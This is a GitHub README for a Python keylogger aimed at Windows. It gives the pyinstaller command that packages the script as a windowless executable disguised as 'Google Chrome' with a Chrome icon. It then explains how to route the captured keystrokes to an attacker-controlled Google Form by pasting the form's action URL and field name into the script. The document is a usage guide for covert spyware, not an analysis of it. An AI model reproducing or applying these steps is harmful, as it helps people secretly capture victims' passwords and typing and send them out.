Skip to content

Latest commit

 

History

History
21 lines (16 loc) · 1.29 KB

README.md

File metadata and controls

21 lines (16 loc) · 1.29 KB

A.K-Python-KeyLogger

A.K Python KeyLogger is a python based keylogger and linked with Google Chrome for windows based operating system. Use pyinstaller to convert .py file with dependencies to single .exe file:-

  pyinstaller --onefile --noconsole --ico=chrome.ico "Google Chrome.py"

Note you can use this icon.

Requirements:

Create a Google Form like this: Google Forms

And then open source code of your form like this: Source Code

And from there retrieve from form action value='xxxx' and text name value='xxxx' as shown in image. And then paste it under remote() method's url and klog variables.